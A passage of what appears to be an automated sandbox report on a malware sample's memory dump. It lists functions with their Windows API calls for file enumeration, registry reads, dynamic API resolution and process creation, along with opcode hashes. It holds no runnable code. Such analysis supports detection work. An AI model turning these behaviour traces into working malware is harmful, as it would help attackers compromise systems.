                                                            Function 04BADFA6, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aacfbdb73c560d389bd5ca5f617350debbb2c91b9088da663ef27184614e5919
                                                            • Instruction ID: 6f1716c766b25f3ff86d22bc8cbbe7b4b6263268d219216246ea99762d1fa420
                                                            • Opcode Fuzzy Hash: aacfbdb73c560d389bd5ca5f617350debbb2c91b9088da663ef27184614e5919
                                                            • Instruction Fuzzy Hash: 3641B4715487019FD7309F79C8C696BBBE9FB88365B004A6EF1A6C3580D771F8218B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA3782, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA9A91), ref: 04BA37D0
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04BA9A91,?,?,?,00000000,04BA81F8), ref: 04BA3803
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BA382A
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BA383E
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BA384B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BA386E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateComputerFreeName
                                                            • String ID:
                                                            • API String ID: 3439771632-0
                                                            • Opcode ID: 19a31ed4a4d99119001c96ca4cc37566df276f38552ba625efcc3e060f3fa8bf
                                                            • Instruction ID: e4724246070abdc65dcd555393565e62fb55bdb00b3e3faf84d37e2cb1d3f633
                                                            • Opcode Fuzzy Hash: 19a31ed4a4d99119001c96ca4cc37566df276f38552ba625efcc3e060f3fa8bf
                                                            • Instruction Fuzzy Hash: 6031F976A04209EFEB10DFB9D8C1A6EB7F9FB48210F51446AE905D3240D734ED548B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BABFEF, Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB4B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04BA1211,?), ref: 04BB4B72
                                                              • Part of subcall function 04BB4B63: mbstowcs.NTDLL ref: 04BB4B8E
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 04BAC042
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04BAC063
                                                            • lstrlenW.KERNEL32(04BAEE33), ref: 04BAC08D
                                                              • Part of subcall function 04BC0BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04BC0D1B
                                                              • Part of subcall function 04BC0BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04BC0D50
                                                              • Part of subcall function 04BC0BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04BC0D6C
                                                              • Part of subcall function 04BC0BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04BC0D85
                                                              • Part of subcall function 04BC0BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04BC0D97
                                                              • Part of subcall function 04BC0BC5: FindClose.KERNEL32(?), ref: 04BC0DAC
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0DC0
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0DE2
                                                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 04BAC0AA
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04BAC0C1
                                                            • PathFindFileNameW.SHLWAPI(0000001E), ref: 04BAC0D6
                                                              • Part of subcall function 04BBEDBE: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,04BAC0ED,?,0000001E,?), ref: 04BBEDD3
                                                              • Part of subcall function 04BBEDBE: lstrlenW.KERNEL32(00000000,?,?,?,04BAC0ED,?,0000001E,?), ref: 04BBEDDB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                            • String ID:
                                                            • API String ID: 2670873185-0
                                                            • Opcode ID: 7ab4f38be0c6ef099a57e0b4734ca1f9e77151cf5f7d5424137a0a2b0270d5cc
                                                            • Instruction ID: 7c6b5668c073d4e3046cbfba6c75a085e4c6a8ed402164ed77155c15bed0ed68
                                                            • Opcode Fuzzy Hash: 7ab4f38be0c6ef099a57e0b4734ca1f9e77151cf5f7d5424137a0a2b0270d5cc
                                                            • Instruction Fuzzy Hash: 79314D72508205AFDB10EF64C8C486FBBF9FB88258F00496EF59493110E735ED658B62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB05FC, Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04BB0615
                                                              • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,04BA138B,00000000,04BCC16C,00000000), ref: 04BBB572
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04BA1C48,00000000), ref: 04BB0657
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 04BB06A9
                                                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04BA1C48,00000000), ref: 04BB06C2
                                                            • GetCursorFrameInfo.USER32 ref: 04BB06ED
                                                              • Part of subcall function 04BC3CDF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BC3D00
                                                              • Part of subcall function 04BC3CDF: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04BB0648,00000000,00000000,00000000,00000001,?,00000000), ref: 04BC3D43
                                                            • GetLastError.KERNEL32(?,00000000,04BA1C48,00000000), ref: 04BB06FA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$AllocAllocateCursorErrorFileFrameHeaderImageInfoLastModuleNameVirtual
                                                            • String ID:
                                                            • API String ID: 3373556483-0
                                                            • Opcode ID: fe120fb098fc41df9fc4d24f3dfff4a445631131bd1b513784340d1ca62209f7
                                                            • Instruction ID: 7dccb40b13ad465a64cddf18799679276ba67d88f9c80066a9b61e2e31ebd324
                                                            • Opcode Fuzzy Hash: fe120fb098fc41df9fc4d24f3dfff4a445631131bd1b513784340d1ca62209f7
                                                            • Instruction Fuzzy Hash: 0C31FB71A00209EFDB11EFA5D881AFE7BB4EB48750F1044A6E946EB250D7B4AD40DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BACDCB, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BACDE5
                                                            • CreateWaitableTimerA.KERNEL32(04BCC1A8,00000001,?), ref: 04BACE02
                                                            • GetLastError.KERNEL32(?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE13
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.KERNEL32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04BB5AB0,04BB5AB0,?,04BA74AD,?), ref: 04BB68EA
                                                              • Part of subcall function 04BB68B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB68FE
                                                              • Part of subcall function 04BB68B2: RegQueryValueExA.ADVAPI32(00000000,04BB5AB0,00000000,04BB5AB0,00000000,?,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40), ref: 04BB6918
                                                              • Part of subcall function 04BB68B2: RegCloseKey.ADVAPI32(00000000,?,04BA74AD,?,04BB5AB0,00000000,00000001,00000000,73B74D40,?,?,?,04BB5AB0,00000000), ref: 04BB6942
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE53
                                                            • SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE72
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BA7AF7,00000000,00000000,00008008), ref: 04BACE88
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                            • String ID:
                                                            • API String ID: 1835239314-0
                                                            • Opcode ID: ba68ad3a9138856c72214416eef67bc5a8c00f2b296668ebe7fd6b480c523abd
                                                            • Instruction ID: f4fdc9622214edd03a592b7fb2dcad65462eff986017ebec2826f7eba107ce85
                                                            • Opcode Fuzzy Hash: ba68ad3a9138856c72214416eef67bc5a8c00f2b296668ebe7fd6b480c523abd
                                                            • Instruction Fuzzy Hash: D7312871904109EBCB20DFA9C8C9CAFBFB9EB89751B208896E545E7100D334BE51CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB86BD, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?,?,04BCC140), ref: 04BB86D5
                                                            • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?,?,04BCC140), ref: 04BB86E6
                                                              • Part of subcall function 04BC29DE: lstrlen.KERNEL32(?,04BA2DC6,00000000,00000000,?,04BBDF3C,?,?,00000014,04BA2DC6,?,?), ref: 04BC29F0
                                                              • Part of subcall function 04BC29DE: StrChrA.SHLWAPI(?,0000000D,?,04BBDF3C,?,?,00000014,04BA2DC6,?,?), ref: 04BC2A28
                                                            • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 04BB8726
                                                            • memcpy.NTDLL(00000000,?,00000007,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?), ref: 04BB8753
                                                            • memcpy.NTDLL(00000000,04BCC140,04BCC140,00000000,?,00000007,?,?,?,04BB3BE7,00000000,?,04BCBAA8,?), ref: 04BB8762
                                                            • memcpy.NTDLL(04BCC140,?,?,00000000,04BCC140,04BCC140,00000000,?,00000007,?,?,?,04BB3BE7,00000000,?,04BCBAA8), ref: 04BB8774
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: ec911a7c46bee6049c71dfc0ef7712891c896582fd07ed53ea266da3790836f2
                                                            • Instruction ID: 21f26077c6847cf102141ec3003fb85689b26fbb35b642bbd6de3b722dc8078e
                                                            • Opcode Fuzzy Hash: ec911a7c46bee6049c71dfc0ef7712891c896582fd07ed53ea266da3790836f2
                                                            • Instruction Fuzzy Hash: 47219272500209BFDB119F9ADC84F9ABBACEF1C758F0940A2E944DB151D674EE448BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB9EC9, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 04BB9F08
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BB9F19
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 04BB9F34
                                                            • GetLastError.KERNEL32 ref: 04BB9F4A
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB9F5C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB9F71
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                            • String ID:
                                                            • API String ID: 1822509305-0
                                                            • Opcode ID: d288a3c9febe8c114dafe2a5e017883da5bca9e7daf389a7202fdbcbd2427440
                                                            • Instruction ID: f432fe5743c170e96e9445b334fe9c4b94f9fabaf219a9f02e8e8a80fd74a547
                                                            • Opcode Fuzzy Hash: d288a3c9febe8c114dafe2a5e017883da5bca9e7daf389a7202fdbcbd2427440
                                                            • Instruction Fuzzy Hash: 7A112E76901118FBDB215BA6DC84CEF7F7DEB492A1B000062F645E2150D675AA51EBF0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBDC0F, Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,73BCF710), ref: 04BBDC2D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 04BBDC5B
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BBDC6D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04BBDC92
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BBDCAD
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BBDCB7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                            • String ID:
                                                            • API String ID: 170146033-0
                                                            • Opcode ID: 01d41e31acc768f975ffb1ea0ad396f2190caa03e05e65c3974d40039fc1aa6a
                                                            • Instruction ID: c583aa0dd058c186a0ee6eb46730c0bb6c339f4456908ee8d3bbcaf1c79450fd
                                                            • Opcode Fuzzy Hash: 01d41e31acc768f975ffb1ea0ad396f2190caa03e05e65c3974d40039fc1aa6a
                                                            • Instruction Fuzzy Hash: B511E47690010CFFDB11DBA9ED84CEEBBFDEB88604B0441A6E905E3114E375AE55DB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAB869, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB87A
                                                            • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB881
                                                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04BAB893
                                                            • _snprintf.NTDLL ref: 04BAB8B9
                                                              • Part of subcall function 04BBA976: memset.NTDLL ref: 04BBA98B
                                                              • Part of subcall function 04BBA976: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 04BBA9C4
                                                              • Part of subcall function 04BBA976: wcstombs.NTDLL ref: 04BBA9CE
                                                              • Part of subcall function 04BBA976: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,?,00000000,?), ref: 04BBA9FF
                                                              • Part of subcall function 04BBA976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BC1B1D), ref: 04BBAA2B
                                                              • Part of subcall function 04BBA976: TerminateProcess.KERNEL32(?,000003E5), ref: 04BBAA41
                                                              • Part of subcall function 04BBA976: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BC1B1D), ref: 04BBAA55
                                                              • Part of subcall function 04BBA976: CloseHandle.KERNEL32(?), ref: 04BBAA88
                                                              • Part of subcall function 04BBA976: CloseHandle.KERNEL32(?), ref: 04BBAA8D
                                                            • _snprintf.NTDLL ref: 04BAB8ED
                                                              • Part of subcall function 04BBA976: GetLastError.KERNEL32 ref: 04BBAA59
                                                              • Part of subcall function 04BBA976: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04BBAA79
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 04BAB90A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                                            • String ID:
                                                            • API String ID: 1481739438-0
                                                            • Opcode ID: 4d5e26f21cff24edb987dc02136b7ad40558deb7ae9b3af25655d0fdf74711a0
                                                            • Instruction ID: 701ea9fe04209106d6d3e2b6cef04f78b06e579f3eba0827b4e7f4149f624738
                                                            • Opcode Fuzzy Hash: 4d5e26f21cff24edb987dc02136b7ad40558deb7ae9b3af25655d0fdf74711a0
                                                            • Instruction Fuzzy Hash: 6A11A97250421DBBCF119F54DCC4D9A3F6CEB18364B0A8066FA1997252C675EE209BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBE44D, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,04BBEF72,00000000,00000001), ref: 04BBE46D
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE48C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4A1
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4B7
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4CD
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04BBE4E3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateHeapLibraryLoad
                                                            • String ID:
                                                            • API String ID: 2486251641-0
                                                            • Opcode ID: d209ce9f7cd8ef7d3d47d18386880e5ce55379ff228c0d7971b01edc2cf634d3
                                                            • Instruction ID: 5cc379870681fec5b0e3eecb96ad4af8660d51ac0536810576dac369a6bd4970
                                                            • Opcode Fuzzy Hash: d209ce9f7cd8ef7d3d47d18386880e5ce55379ff228c0d7971b01edc2cf634d3
                                                            • Instruction Fuzzy Hash: 521133B260031B9F9720DB69DCC4DB737ECEB0874430A8566F949C7212EA34E905CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB90ED, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                            • GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                            • GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                            • lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1175089793-0
                                                            • Opcode ID: 7cc2d2560f4ef5bae91a7aacd43075b8e7cd6080401ca81476bf91c37c2cdcec
                                                            • Instruction ID: f31a956de532f7024c20892ccf8ec3f42e3284383b6751135774b9d3deef5fd3
                                                            • Opcode Fuzzy Hash: 7cc2d2560f4ef5bae91a7aacd43075b8e7cd6080401ca81476bf91c37c2cdcec
                                                            • Instruction Fuzzy Hash: 780161B6A002157B97115BB6DCCCDBB7BBCDF89B40B054066BB05E3201DA68F81596B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA1731, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04BB6BB6,00000000,?,?,?,04BB6BB6,?,?,?,?,?), ref: 04BA176F
                                                            • lstrlen.KERNEL32(04BB6BB6,?,?,?,04BB6BB6,?,?,?,?,?), ref: 04BA178D
                                                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 04BA17FC
                                                            • lstrlen.KERNEL32(04BB6BB6,00000000,00000000,?,?,?,04BB6BB6,?,?,?,?,?), ref: 04BA181D
                                                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04BA1831
                                                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 04BA183A
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04BA1848
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlenmemcpy$FreeLocal
                                                            • String ID:
                                                            • API String ID: 1123625124-0
                                                            • Opcode ID: f89e3e788bc3d01271ea34252163a0b0bc42372838b7e13d4d8c92e1dba1bdf1
                                                            • Instruction ID: a720038f062ae57024d58c07fd4cfbdc84589177af89f0c8e998d5971bb4f674
                                                            • Opcode Fuzzy Hash: f89e3e788bc3d01271ea34252163a0b0bc42372838b7e13d4d8c92e1dba1bdf1
                                                            • Instruction Fuzzy Hash: EA41E9B280421AABDF10DF69DC819DB3BA8EF182A4F054465FD14A7210E735EE64CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBBE8F, Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04BB5AB0,00000010,?,?,?,?,?,?,?,?,?,?,04BC3452,00000000,00000001), ref: 04BBBEE0
                                                            • memcpy.NTDLL(00000000,00000001,04BB5AB0,0000011F), ref: 04BBBF73
                                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 04BBBFCB
                                                            • GetLastError.KERNEL32 ref: 04BBBFFD
                                                            • GetLastError.KERNEL32 ref: 04BBC011
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04BC3452,00000000,00000001,04BB5AB0,?,04BB5AB0), ref: 04BBC026
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$memcpy
                                                            • String ID:
                                                            • API String ID: 2760375183-0
                                                            • Opcode ID: dece40112129d138d4883a13521b1116a2cf5deada80207fa9c44186769dc9f7
                                                            • Instruction ID: 9987e350e84603d2aeb0bf4d85ccf08c1160822409f90fc921ae51eed8bdc9aa
                                                            • Opcode Fuzzy Hash: dece40112129d138d4883a13521b1116a2cf5deada80207fa9c44186769dc9f7
                                                            • Instruction Fuzzy Hash: E3512B71904208FFDB10DFA9D884AEEBBB9EB08354F10846AF951E7240E775AE54DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBF081, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,770F4620,00000000,00000000,04BA114F,?), ref: 04BA2B66
                                                              • Part of subcall function 04BA2B55: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04BA2B83
                                                            • lstrlenW.KERNEL32(00000000,00000000,73B006E0,?,?,80000001,?), ref: 04BBF0C7
                                                            • lstrlenW.KERNEL32(00000008), ref: 04BBF0CE
                                                            • lstrlenW.KERNEL32(?,?), ref: 04BBF0EA
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 04BBF164
                                                            • lstrlenW.KERNEL32(?), ref: 04BBF170
                                                            • wsprintfA.USER32 ref: 04BBF19E
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
                                                            • String ID:
                                                            • API String ID: 3384896299-0
                                                            • Opcode ID: 44b16b45f4f8b222521fb3ea2b5af2f7c31c4d2d33e6f70c07d9f910278bcdec
                                                            • Instruction ID: 837841175ec13438c9969460a4be739368bc6cdf750391f5373fe3d41132162b
                                                            • Opcode Fuzzy Hash: 44b16b45f4f8b222521fb3ea2b5af2f7c31c4d2d33e6f70c07d9f910278bcdec
                                                            • Instruction Fuzzy Hash: 66416171900209EFDF01AFA8DC84DFE7BB9EF48204B058496F915E7211EB75EA249F60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAA8B7, Relevance: 7.6, APIs: 5, Instructions: 133registrysynchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                            • WaitForSingleObject.KERNEL32(00000000,?,05C8993C,?,00000000,00000000,00000001), ref: 04BAA961
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BAA99B
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BAA9C7
                                                            • WaitForSingleObject.KERNEL32(00000000,Function_00008936,04BCC1E4), ref: 04BAAA2B
                                                            • RtlExitUserThread.NTDLL(?), ref: 04BAAA61
                                                              • Part of subcall function 04BB5EFC: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04BB5A38,00000000,?,?), ref: 04BB5F1A
                                                              • Part of subcall function 04BB5EFC: GetFileSize.KERNEL32(00000000,00000000,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?), ref: 04BB5F2A
                                                              • Part of subcall function 04BB5EFC: CloseHandle.KERNEL32(000000FF,?,?,04BB5A38,00000000,?,?,?,?,00000000,04BADBFF,?,?,?,?,00000000), ref: 04BB5F8C
